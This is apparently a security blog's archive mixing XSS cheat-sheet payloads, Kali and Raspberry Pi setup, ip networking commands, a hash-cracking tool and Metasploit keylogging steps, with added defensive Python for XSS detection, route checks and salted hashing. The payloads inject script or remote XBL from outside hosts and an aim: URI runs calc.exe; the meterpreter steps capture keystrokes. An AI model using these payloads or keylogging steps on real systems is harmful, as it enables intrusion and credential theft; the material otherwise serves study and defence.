Mar 16, 2013

Howto: XSS Cheat Sheet

If you want to see the full list, please go to the Source.

A very short cross browser header injection
Exploit Name: A very short cross browser header injection
Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws'
Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.
Exploit Tags: xss, short, header, injection
Author Name: .mario
Add onclick event handler
Exploit Name: Add onclick event handler
Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert.
Exploit Tags: general, JS breaking, basic, obfuscated, user interaction
Author Name: kishor
Advanced HTML injection locator
Exploit Name: Advanced HTML injection locator
Exploit String: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
Exploit Description: This vector reveals HTML injection as struck-through (<s>) text: whichever encoding the target decodes, the matching digits render inside an <s> element.
Exploit Tags: general, html breaking, injection
Author Name: .mario
Advanced XSS Locator
Exploit Name: Advanced XSS Locator
Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
Exploit Description: Advanced XSS Locator
Exploit Tags: general, html breaking, comment breaking, JS breaking
Author Name: .mario
Advanced XSS Locator for title-Injections
Exploit Name: Advanced XSS Locator for title-Injections
Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections.
Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking
Author Name: .mario
aim: uri exploit
Exploit Name: aim: uri exploit
Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
Exploit Description: This aim: URI executes calc.exe on vulnerable systems.
Exploit Tags: URI exploits, gecko, injection, general
Author Name: xs-sniper
Backslash-obfuscated XBL injection - variant 1
Exploit Name: Backslash-obfuscated XBL injection - variant 1
Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Exploit Description: This vector uses backslashes to exploit a parsing error in Gecko-based browsers and injects a remote XBL.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk
Backslash-obfuscated XBL injection - variant 2
Exploit Name: Backslash-obfuscated XBL injection - variant 2
Exploit String: <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
Exploit Description: This vector uses backslashes to exploit a parsing error in Gecko-based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk
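A defender-side companion to the "Advanced HTML injection locator" entry above, added here and not part of the cheat sheet: it peels off the URL-encoding and the semicolon-less decimal and hex entities that locator is built from, so a tag hidden behind any of those layers becomes visible to a detector, and it shows that escaping the raw value keeps every layer as literal text. The LOCATOR constant is the cheat sheet's own string; the function names are this example's.

```python
import html
import re
from urllib.parse import unquote

# The "Advanced HTML injection locator" string from the cheat sheet, used as sample input.
LOCATOR = ("<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e"
           "&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62"
           "&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e")

# An opening or closing tag start such as "<s", "</s" or "< s". A letter must follow,
# so arithmetic like "5 < 6" is not flagged.
TAG_START = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)


def normalize(value, max_rounds=3):
    """Decode URL-encoding and HTML entities until the value stops changing.
    html.unescape accepts numeric entities without a trailing semicolon, which is
    exactly what the locator relies on, so stacked encodings cannot hide a tag."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def find_tag_injections(value):
    """Every tag start found after normalization; a non-empty list means the input
    would render markup if it reached an HTML context unescaped."""
    return [m.group(0) for m in TAG_START.finditer(normalize(value))]


def render_safely(value):
    """Escape the RAW value for an HTML text or attribute context. The entities and
    percent-escapes stay literal text, so none of the encoded layers becomes a tag."""
    return html.escape(value, quote=True)
```

Run `find_tag_injections(LOCATOR)` on untrusted input at the boundary to log attempts; `render_safely` is the output-side control that makes the locator harmless regardless of which encoding the page's own decoder accepts.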

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Generate Wordlist On Windows

L517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords.  

Source: https://code.google.com/p/l517/


Howto: Wireless Penetration testing with Kali Linux on a Raspberry Pi

1. Just plug your USB Wi-Fi adapter into the Pi.

2. At the command prompt type “ifconfig” and check whether your Wi-Fi adapter is listed. It should show up as wlan0. If you don’t see it, type “ifconfig wlan0 up“. Then run “ifconfig” again and it should show up.
3. Next let’s see what networks our wireless card can see.
Type “iwlist wlan0 scanning“.
4. Now let’s run some of the basic Aircrack-ng tools.
First we need to put our wireless adapter into monitor mode.
Type “airmon-ng start wlan0“ (the syntax is airmon-ng <start|stop> <interface>).
This creates a new wireless interface called mon0. Now we can use this interface to capture wireless management and control frames.
5. Now use tcpdump.
Simply type “tcpdump -i mon0“.
This will display all the management and control traffic for every wireless network within reach of your Wi-Fi adapter.

Source: http://cyberarms.wordpress.com/2013/03/14/wireless-penetration-testing-with-kali-linux-on-a-raspberry-pi/




Howto: Installing Kali(Backtrack6) on Raspberry Pi



1. Download the Kali Linux image (located about halfway down the page).

2. The image file is compressed; you will need to expand it.

3. Next, install the image to your SD card; Disk Imager works great.

Just plug your SD card into your Windows Laptop, and run Disk Imager. Point the image file to your Kali image that you downloaded and point the device to the drive letter of your SD card.

Then just hit “Write”:


Disk Imager will write the Kali Linux image to your SD card.

4. Now eject the SD card from your windows laptop and insert it into the SD card slot on your Raspberry Pi. Connect your video, Ethernet cable, and keyboard and mouse.

5. Connect power to the Raspberry Pi and in a few seconds it will boot up into Kali.

That is it! You now have a Raspberry Pi pentesting platform!

Connecting to the Raspberry Pi remotely from a Windows system using SSH


Now you can run commands from the command prompt. If you want to run the Raspberry Pi headless (without monitor or keyboard), you can connect to the Pi from a Windows system remotely using SSH.

To Do so:

1. Download PuTTY for Windows.

2. Run PuTTY and enter the IP address of your Kali system. You can get this by typing “ifconfig” if you have a keyboard attached, or by checking the address your router assigned to it if you are running Kali headless.

My IP address was 192.168.1.135 in this case. Also, make sure port 22 is entered and select SSH as shown below:


Then just hit “Open”.

You will be asked to log into the Raspberry Pi. If this is the first time, just use the Kali default credentials:

Username: root
Password: toor


That’s it!


Mar 14, 2013

Howto: 10 Useful “IP” Commands to Configure Network Interfaces

1. How to Assign an IP Address to a Specific Interface
The following command is used to assign an IP address to a specific interface (eth1) on the fly.
# ip addr add 192.168.50.5 dev eth1
$ sudo ip addr add 192.168.50.5 dev eth1
Note: Unfortunately, all these settings are lost after a system restart.
2. How to Check an IP Address
To get detailed information about your network interfaces, such as IP address and MAC address, use the following command.
# ip addr show
$ sudo ip addr show
3. How to Remove an IP Address
The following command will remove an assigned IP address from the given interface (eth1).
# ip addr del 192.168.50.5/24 dev eth1
$ sudo ip addr del 192.168.50.5/24 dev eth1

4. How to Enable Network Interface
The “up” flag with an interface name (eth1) enables a network interface. For example, the following command activates the eth1 network interface.
# ip link set eth1 up
$ sudo ip link set eth1 up

5. How to Disable Network Interface
The “down” flag with an interface name (eth1) disables a network interface. For example, the following command deactivates the eth1 network interface.
# ip link set eth1 down
$ sudo ip link set eth1 down

6. How do I Check Route Table?
Type the following command to display the system's routing table.
# ip route show
$ sudo ip route show

7. How do I Add a Static Route
Static (manual) routes are needed when traffic to a destination must not go through the default gateway; a static route sends that traffic along the chosen path to reach the destination.
# ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0
$ sudo ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0

8. How to Remove Static Route
To remove assigned static route, simply type the following command.
# ip route del 10.10.20.0/24
$ sudo ip route del 10.10.20.0/24

9. How do I Add Persistent Static Routes
All the routes above are lost after a system restart. To add a permanent static route, edit the file /etc/sysconfig/network-scripts/route-eth0 (here we store the static route for eth0), add the following lines, then save and exit. By default the route-eth0 file does not exist and needs to be created.

For RHEL/CentOS/Fedora

# vi /etc/sysconfig/network-scripts/route-eth0
10.10.20.0/24 via 192.168.50.100 dev eth0

For Ubuntu/Debian/Linux Mint

Open the file /etc/network/interfaces and add the persistent static routes at the end. IP addresses may differ in your environment.
$ sudo vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.50.2
netmask 255.255.255.0
gateway 192.168.50.100
#########{Static Route}###########
up ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0
Next, restart the network service after entering all the details using the following command (on Ubuntu/Debian the init script is named networking rather than network).
# /etc/init.d/network restart
$ sudo /etc/init.d/network restart

10. How do I Add a Default Gateway
A default gateway can be specified globally or in an interface-specific config file. Setting it explicitly matters when more than one NIC is present in the system. You can add a default gateway on the fly with the command shown below.
# ip route add default via 192.168.50.100
$ sudo ip route add default via 192.168.50.100
Kindly correct me if I missed anything out. Please refer to the manual page by running man ip from the terminal to learn more about the ip command.
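Steps 7, 9 and 10 each end with a route that should survive a reboot; the check below is an added example (not from the original article) that parses `ip route show` output and confirms the expected static route and default gateway are present. The sample output is constructed from the addresses used above; the function names are this example's own.

```python
# Constructed sample of `ip route show` output after steps 7 and 10 above were applied.
SAMPLE_IP_ROUTE = """\
default via 192.168.50.100 dev eth0
10.10.20.0/24 via 192.168.50.100 dev eth0
192.168.50.0/24 dev eth0 proto kernel scope link src 192.168.50.2
"""

# Keywords that `ip route` prints without a following value.
FLAG_WORDS = {"onlink", "linkdown", "dead", "pervasive", "notify"}


def parse_ip_route(output):
    """Turn each `ip route show` line into a dict keyed by the printed keywords."""
    routes = []
    for line in output.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        # `default` is shorthand for the 0.0.0.0/0 destination.
        route = {"dst": "0.0.0.0/0" if tokens[0] == "default" else tokens[0]}
        i = 1
        while i < len(tokens):
            if tokens[i] in FLAG_WORDS:
                route[tokens[i]] = True
                i += 1
            elif i + 1 < len(tokens):
                route[tokens[i]] = tokens[i + 1]
                i += 2
            else:
                i += 1  # dangling keyword with no value; ignore it
        routes.append(route)
    return routes


def has_route(routes, dst, via=None, dev=None):
    """True if a route to dst exists, optionally matching next hop and interface."""
    for r in routes:
        if r["dst"] != dst:
            continue
        if via is not None and r.get("via") != via:
            continue
        if dev is not None and r.get("dev") != dev:
            continue
        return True
    return False


def default_gateways(routes):
    """Every next hop used for a default route; more than one usually signals a misconfiguration."""
    return [r["via"] for r in routes if r["dst"] == "0.0.0.0/0" and "via" in r]
```

Feed it the real output with `subprocess.run(["ip", "route", "show"], capture_output=True, text=True).stdout` after the restart in step 9 to confirm the persistent route took effect.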

Source: http://www.tecmint.com/ip-command-examples/


Mar 11, 2013

Tools: CrackStation.Net - Free Password Hash Cracker

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password and the correct password for that hash. The hash values are indexed so that the database can be searched quickly for a given hash. If the hash is present in the database, the password can be recovered in only a fraction of a second.
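To show why such a table only works against unsalted hashes, here is an added example (it is not CrackStation's code) with a four-word constructed wordlist: the table answers instantly for an unsalted hash, returns nothing once a per-user salt is mixed in, and a slow salted KDF is what a defender should store instead.

```python
import hashlib
import os

# Constructed wordlist standing in for the words behind a pre-computed table.
WORDLIST = ["password", "letmein", "123456", "qwerty"]


def build_lookup_table(words, algo="sha256"):
    """Hash every word once. The table maps hash -> password and is reused for every
    query, which is why an unsalted hash that appears in it falls in a fraction of a second."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def lookup(table, hexdigest):
    """Instant recovery if the hash was precomputed, None otherwise."""
    return table.get(hexdigest)


def salted_hash(password, salt, algo="sha256"):
    """A per-user random salt changes every output, so a table built for unsalted hashes
    (or for another user's salt) contains nothing useful for this user."""
    return hashlib.new(algo, salt + password.encode()).hexdigest()


def slow_hash(password, salt, iterations=600_000):
    """What to store instead: a deliberately slow, salted KDF (PBKDF2-HMAC-SHA256).
    Every table entry now costs the attacker `iterations` hash computations, per salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def new_salt():
    """16 random bytes from the OS CSPRNG, generated once per user at password set time."""
    return os.urandom(16)
```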

Source: http://crackstation.net/


Mar 10, 2013

Howto: Keylogging with Metasploit

1. Exploit the Client

2. List the processes with 'ps'
meterpreter> ps

3. Find the PID of Explorer.exe

4. Migrate into the explorer.exe process
meterpreter> migrate pid_of_explorer.exe

5. Start keylogging
meterpreter> keyscan_start

6. Dump the keylogger memory.
meterpreter> keyscan_dump    



Tools: HTTY - Console For HTTP Protocol

htty is a console application for interacting with web servers. It’s a fun way to explore web APIs and to learn the ins and outs of HTTP.

Source: http://htty.github.com/htty/
